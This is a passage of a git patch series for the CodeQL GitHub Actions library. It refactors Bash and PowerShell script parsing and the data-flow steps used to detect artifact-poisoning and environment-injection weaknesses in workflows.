b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index b0d98d2e659..787a5f72084 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -49,8 +49,15 @@ predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow:: * echo "bar=${foo}" >> "$GITHUB_OUTPUT" */ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(CommandSource source, Run run, string key, string cmd | - source.getCommand() = cmd and + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::outputsPartialFileContent(run, cmd) + ) + ) and Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getScriptScalar() and @@ -67,8 +74,15 @@ predicate commandToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, Dat * echo "bar=${foo}" >> "$GITHUB_ENV" */ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(CommandSource source, Run run, string key, string cmd | - source.getCommand() = cmd and + exists(Run run, string key, string cmd | + ( + exists(CommandSource source | source.getCommand() = cmd) + or + exists(FileSource source | + source.asExpr().(Step).getAFollowingStep() = run and + Bash::outputsPartialFileContent(run, cmd) + ) + ) and Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and c = any(DataFlow::FieldContent ct | ct.getName() = key) and pred.asExpr() = run.getScriptScalar() and @@ -76,41 +90,3 @@ predicate commandToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFl succ.asExpr() = run.getEnclosingJob() ) } - -/** - * A downloaded artifact that gets assigned to a Run step output. - * - uses: actions/download-artifact@v2 - * - run: echo "::set-output name=id::$(> "$GITHUB_ENV" - * - run: | - * foo=$(> "$GITHUB_ENV" - */ -predicate fileToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(FileSource source, Run run, string key, string cmd | - source.asExpr().(Step).getAFollowingStep() = run and - Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", key) and - Bash::outputsPartialFileContent(run, cmd) and - c = any(DataFlow::FieldContent ct | ct.getName() = key) and - pred.asExpr() = run.getScriptScalar() and - // we store the taint on the enclosing job since there may not be an implicit env attribute - succ.asExpr() = run.getEnclosingJob() - ) -} diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index d7c3dad9ee7..cf95292588c 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -351,8 +351,6 @@ predicate storeStep(Node node1, ContentSet c, Node node2) { madStoreStep(node1, node2, c) or envToOutputStoreStep(node1, node2, c) or envToEnvStoreStep(node1, node2, c) or - fileToOutputStoreStep(node1, node2, c) or - fileToEnvStoreStep(node1, node2, c) or commandToOutputStoreStep(node1, node2, c) or commandToEnvStoreStep(node1, node2, c) } From a09acb546228a9f11a2ddedd5c5a1ce4d80ea324 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sun, 13 Oct 2024 11:56:09 +0200 Subject: [PATCH 0581/1267] Better parsing of Bash script commands --- ql/lib/codeql/actions/Bash.qll | 15 ++- ql/lib/codeql/actions/ast/internal/Ast.qll | 107 ++++++++++++++---- .../actions/security/PoisonableSteps.qll | 2 +- 3 files changed, 95 insertions(+), 29 deletions(-) diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index 5907b601a46..fc9a75319eb 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -8,14 +8,21 @@ module Bash { string commandSeparator() { result = ["&&", "||"] } - string pipeSeparator() { result = "|" } - - string splitSeparators() { - result = stmtSeparator() or result = commandSeparator() or result = pipeSeparator() + string splitSeparator() { + result = stmtSeparator() or + result = commandSeparator() } string redirectionSeparator() { result = [">", ">>", "2>", "2>>", ">&", "2>&", "<", "<<<"] } + string pipeSeparator() { result = "|" } + + string separator() { + result = stmtSeparator() or + result = commandSeparator() or + result = pipeSeparator() + } + string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } /** Checks if expr is a bash command substitution */ diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index a4b5778246a..eaf1ae871a9 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1438,39 +1438,43 @@ class RunImpl extends StepImpl { max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) } - private string cmdProducer(int i) { - result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparators()).trim() and + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and // when splitting the line with a separator that is not present, the result is the original line which may contain other separators // we only one the split parts that do not contain any of the separators - not result.indexOf(Bash::splitSeparators()) > -1 + not result.indexOf(Bash::splitSeparator()) > -1 } - private predicate doRestoreQuotedStrings(int line, int round, string old, string new) { + private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { round = 0 and - old = this.cmdProducer(line) and + old = this.stmtProducer(line) and new = old or round > 0 and exists(string middle, string target, string replacement | - this.doRestoreQuotedStrings(line, round - 1, old, middle) and + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and this.rankedQuotedStringReplacements(round, target, replacement) and new = middle.replaceAll(replacement, target) ) } - private string restoredQuotedStringLineProducer(int i) { + private string restoredStmtQuotedStringLineProducer(int i) { result = - max(int round, string new | this.doRestoreQuotedStrings(i, round, _, new) | new order by round) + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) } - private predicate doRestoreCmdSubstitutions(int line, int round, string old, string new) { + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { round = 0 and - old = this.restoredQuotedStringLineProducer(line) and + old = this.restoredStmtQuotedStringLineProducer(line) and new = old or round > 0 and exists(string middle, string target, string replacement | - this.doRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and this.rankedCmdSubstitutionReplacements(round, target, replacement) and new = middle.replaceAll(replacement, target) ) @@ -1479,7 +1483,7 @@ class RunImpl extends StepImpl { string getStmt(int i) { result = max(int round, string new | - this.doRestoreCmdSubstitutions(i, round, _, new) + this.doStmtRestoreCmdSubstitutions(i, round, _, new) | new order by round ) @@ -1487,6 +1491,73 @@ class RunImpl extends StepImpl { string getAStmt() { result = this.getStmt(_) } + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getACmd() { result = this.getCmd(_) } + + string getCommand(int i) { + result = this.getCmd(i) and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + string getACommand() { result = this.getCommand(_) } + predicate getAssignment(int i, string name, string value) { exists(string stmt | stmt = this.getStmt(i) and @@ -1497,18 +1568,6 @@ class RunImpl extends StepImpl { predicate getAnAssignment(string name, string value) { this.getAssignment(_, name, value) } - string getCommand(int i) { - result = this.getStmt(i) and - // exclude the following keywords - not result = - [ - "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", - "esac", "{", "}" - ] - } - - string getACommand() { result = this.getCommand(_) } - predicate getAWriteToGitHubEnv(string name, string value) { exists(string raw | Bash::extractFileWrite(this.getScript(), "GITHUB_ENV", raw) and diff --git a/ql/lib/codeql/actions/security/PoisonableSteps.qll b/ql/lib/codeql/actions/security/PoisonableSteps.qll index a0755f3582d..5e8731010ca 100644 --- a/ql/lib/codeql/actions/security/PoisonableSteps.qll +++ b/ql/lib/codeql/actions/security/PoisonableSteps.qll @@ -18,7 +18,7 @@ class PoisonableCommandStep extends PoisonableStep, Run { PoisonableCommandStep() { exists(string regexp | poisonableCommandsDataModel(regexp) and - exists(this.getACommand().regexpFind(regexp, _, _)) + this.getACommand().regexpMatch("^" + regexp + ".*") ) } } From be87eccbe729abbbda912d476c586b3ffc2ca88b Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:04:20 +0200 Subject: [PATCH 0582/1267] Refactor Script support --- ql/lib/codeql/actions/Ast.qll | 48 ++- ql/lib/codeql/actions/Bash.qll | 398 +++++++++++++++--- ql/lib/codeql/actions/Helper.qll | 1 + ql/lib/codeql/actions/PowerShell.qll | 50 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 374 +++++----------- .../actions/controlflow/internal/Cfg.qll | 2 +- .../codeql/actions/dataflow/FlowSources.qll | 20 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 18 +- ql/lib/codeql/actions/dataflow/TaintSteps.qll | 6 +- .../security/ArgumentInjectionQuery.qll | 20 +- .../security/ArtifactPoisoningQuery.qll | 60 ++- .../actions/security/CodeInjectionQuery.qll | 4 +- .../codeql/actions/security/ControlChecks.qll | 4 +- .../security/EnvPathInjectionQuery.qll | 29 +- .../actions/security/EnvVarInjectionQuery.qll | 29 +- .../security/OutputClobberingQuery.qll | 117 +++-- .../actions/security/PoisonableSteps.qll | 13 +- .../security/UntrustedCheckoutQuery.qll | 16 +- .../.github/workflows/commands.yml | 20 +- ql/test/library-tests/commands.expected | 34 +- ql/test/library-tests/commands.ql | 2 +- .../library-tests/poisonable_steps.expected | 2 - ql/test/library-tests/test.expected | 1 + .../CWE-074/.github/workflows/output1.yml | 1 + .../actions/download-artifact-2/action.yaml | 32 ++ .../actions/download-artifact/action.yaml | 32 ++ .../.github/workflows/artifactpoisoning51.yml | 20 + .../.github/workflows/artifactpoisoning52.yml | 26 ++ .../.github/workflows/artifactpoisoning53.yml | 27 ++ .../.github/workflows/artifactpoisoning91.yml | 29 ++ .../.github/workflows/artifactpoisoning92.yml | 29 ++ .../CWE-077/EnvVarInjectionCritical.expected | 20 + .../CWE-077/EnvVarInjectionMedium.expected | 15 + .../ArtifactPoisoningCritical.expected | 12 - .../CWE-829/ArtifactPoisoningMedium.expected | 9 - 35 files changed, 1001 insertions(+), 519 deletions(-) create mode 100644 ql/lib/codeql/actions/PowerShell.qll create mode 100644 ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cc29ceffe53..620f74e25bb 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,6 +22,10 @@ class AstNode instanceof AstNodeImpl { CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } + + ScalarValue getInScopeDefaultValue(string name, string prop) { + result = super.getInScopeDefaultValue(name, prop) + } } class ScalarValue extends AstNode instanceof ScalarValueImpl { @@ -121,6 +125,10 @@ class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { class Input extends AstNode instanceof InputImpl { } +class Default extends AstNode instanceof DefaultsImpl { + ScalarValue getValue(string name, string prop) { result = super.getValue(name, prop) } +} + class Outputs extends AstNode instanceof OutputsImpl { Expression getAnOutputExpr() { result = super.getAnOutputExpr() } @@ -286,14 +294,18 @@ class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step instanceof RunImpl { - string getScript() { result = super.getScript() } - - ScalarValue getScriptScalar() { result = super.getScriptScalar() } + ShellScript getScript() { result = super.getScript() } Expression getAnScriptExpr() { result = super.getAnScriptExpr() } string getWorkingDirectory() { result = super.getWorkingDirectory() } + string getShell() { result = super.getShell() } +} + +class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl { + string getRawScript() { result = super.getRawScript() } + string getStmt(int i) { result = super.getStmt(i) } string getAStmt() { result = super.getAStmt() } @@ -302,19 +314,23 @@ class Run extends Step instanceof RunImpl { string getACommand() { result = super.getACommand() } - predicate getAssignment(int i, string name, string value) { super.getAssignment(i, name, value) } + string getFileReadCommand(int i) { result = super.getFileReadCommand(i) } - predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } + string getAFileReadCommand() { result = super.getAFileReadCommand() } - predicate getAWriteToGitHubEnv(string name, string value) { - super.getAWriteToGitHubEnv(name, value) + predicate getAssignment(int i, string name, string data) { super.getAssignment(i, name, data) } + + predicate getAnAssignment(string name, string data) { super.getAnAssignment(name, data) } + + predicate getAWriteToGitHubEnv(string name, string data) { + super.getAWriteToGitHubEnv(name, data) } - predicate getAWriteToGitHubOutput(string name, string value) { - super.getAWriteToGitHubOutput(name, value) + predicate getAWriteToGitHubOutput(string name, string data) { + super.getAWriteToGitHubOutput(name, data) } - predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } + predicate getAWriteToGitHubPath(string data) { super.getAWriteToGitHubPath(data) } predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { super.getAnEnvReachingGitHubOutputWrite(var, output_field) @@ -331,6 +347,18 @@ class Run extends Step instanceof RunImpl { predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { super.getACmdReachingGitHubEnvWrite(cmd, output_field) } + + predicate getAnEnvReachingGitHubPathWrite(string var) { + super.getAnEnvReachingGitHubPathWrite(var) + } + + predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) } + + predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) } + + predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) } + + predicate fileToGitHubPath(string path) { super.fileToGitHubPath(path) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index fc9a75319eb..541ab437db2 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll @@ -1,7 +1,303 @@ private import codeql.actions.Ast -private import codeql.Locations -import codeql.actions.config.Config -private import codeql.actions.security.ControlChecks + +class BashShellScript extends ShellScript { + BashShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches("bash%") + ) + } + + private string lineProducer(int i) { + result = this.getRawScript().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparator()) > -1 + } + + private predicate doStmtRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.stmtProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredStmtQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredStmtQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + override string getStmt(int i) { + result = + max(int round, string new | + this.doStmtRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + override string getAStmt() { result = this.getStmt(_) } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getACmd() { result = this.getCmd(_) } + + override string getCommand(int i) { + result = this.getCmd(i) and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + override string getACommand() { result = this.getCommand(_) } + + override string getFileReadCommand(int i) { + result = this.getStmt(i) and + result.matches(Bash::fileReadCommand() + "%") + } + + override string getAFileReadCommand() { result = this.getFileReadCommand(_) } + + override predicate getAssignment(int i, string name, string data) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + data = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + override predicate getAnAssignment(string name, string data) { this.getAssignment(_, name, data) } + + override predicate getAWriteToGitHubEnv(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this.getRawScript(), "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubOutput(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this.getRawScript(), "GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubPath(string data) { + Bash::extractFileWrite(this.getRawScript(), "GITHUB_PATH", data) + } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_PATH", _) + } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) + } + + override predicate fileToGitHubEnv(string path) { + Bash::fileToFileWrite(this, "GITHUB_ENV", path) + } + + override predicate fileToGitHubOutput(string path) { + Bash::fileToFileWrite(this, "GITHUB_OUTPUT", path) + } + + override predicate fileToGitHubPath(string path) { + Bash::fileToFileWrite(this, "GITHUB_PATH", path) + } +} module Bash { string stmtSeparator() { result = ";" } @@ -23,7 +319,7 @@ module Bash { result = pipeSeparator() } - string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + string fileReadCommand() { result = ["<", "cat", "jq", "yq", "tail", "head"] } /** Checks if expr is a bash command substitution */ bindingset[expr] @@ -133,8 +429,7 @@ module Bash { string script, string cmd, string file, string content, string filters ) { exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + regexp = "(?i)(echo|printf)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" and @@ -145,13 +440,12 @@ module Bash { bindingset[script] predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = script.regexpCapture(regexp, 4) and value = trimQuotes(script.regexpCapture(regexp, 5)) or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = "" and value = trimQuotes(script.regexpCapture(regexp, 4)) @@ -262,57 +556,38 @@ module Bash { } /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ - predicate fileToFileWrite(Run run, string file_var, string path) { + predicate fileToFileWrite(BashShellScript script, string file_var, string path) { exists(string regexp, string stmt, string file_expr | regexp = "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - stmt = run.getAStmt() and + stmt = script.getAStmt() and file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and path = stmt.regexpCapture(regexp, 2) and containsParameterExpansion(file_expr, file_var, _, _) ) } - predicate fileToGitHubEnv(Run run, string path) { fileToFileWrite(run, "GITHUB_ENV", path) } - - predicate fileToGitHubOutput(Run run, string path) { fileToFileWrite(run, "GITHUB_OUTPUT", path) } - - predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run, "GITHUB_PATH", path) } - - bindingset[snippet] - predicate outputsPartialFileContent(Run run, string snippet) { - // e.g. - // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - exists(int i, string line, string cmd | - run.getStmt(i) = line and - line.indexOf(snippet.regexpReplaceAll("^\\$\\(", "").regexpReplaceAll("\\)$", "")) > -1 and - run.getCommand(i) = cmd and - cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - ) - } - /** * Holds if the Run scripts contains an access to an environment variable called `var` * which value may get appended to the GITHUB_XXX special file */ - predicate envReachingGitHubFileWrite(Run run, string var, string file_var, string field) { + predicate envReachingGitHubFileWrite( + BashShellScript script, string var, string file_var, string field + ) { exists(string file_write_value | ( file_var = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(field, file_write_value) + script.getAWriteToGitHubEnv(field, file_write_value) or file_var = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(field, file_write_value) + script.getAWriteToGitHubOutput(field, file_write_value) or file_var = "GITHUB_PATH" and field = "PATH" and - run.getAWriteToGitHubPath(file_write_value) + script.getAWriteToGitHubPath(file_write_value) ) and - envReachingRunExpr(run, var, file_write_value) + envReachingRunExpr(script, var, file_write_value) ) } @@ -321,11 +596,11 @@ module Bash { * Where the expression is a string captured from the Run's script. */ bindingset[expr] - predicate envReachingRunExpr(Run run, string var, string expr) { + predicate envReachingRunExpr(BashShellScript script, string var, string expr) { exists(string var2, string value2 | // VAR2=${VAR:-default} (var2=value2) // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) - run.getAnAssignment(var2, value2) and + script.getAnAssignment(var2, value2) and containsParameterExpansion(value2, var, _, _) and containsParameterExpansion(expr, var2, _, _) ) @@ -339,33 +614,42 @@ module Bash { * Holds if the Run scripts contains a command substitution (`cmd`) * which output may get appended to the GITHUB_XXX special file */ - predicate cmdReachingGitHubFileWrite(Run run, string cmd, string file_var, string field) { + predicate cmdReachingGitHubFileWrite( + BashShellScript script, string cmd, string file_var, string field + ) { exists(string file_write_value | ( file_var = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(field, file_write_value) + script.getAWriteToGitHubEnv(field, file_write_value) or file_var = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(field, file_write_value) + script.getAWriteToGitHubOutput(field, file_write_value) or file_var = "GITHUB_PATH" and field = "PATH" and - run.getAWriteToGitHubPath(file_write_value) + script.getAWriteToGitHubPath(file_write_value) ) and - ( - // cmd output is assigned to a second variable (var2) and var2 reaches the file write - exists(string var2, string value2 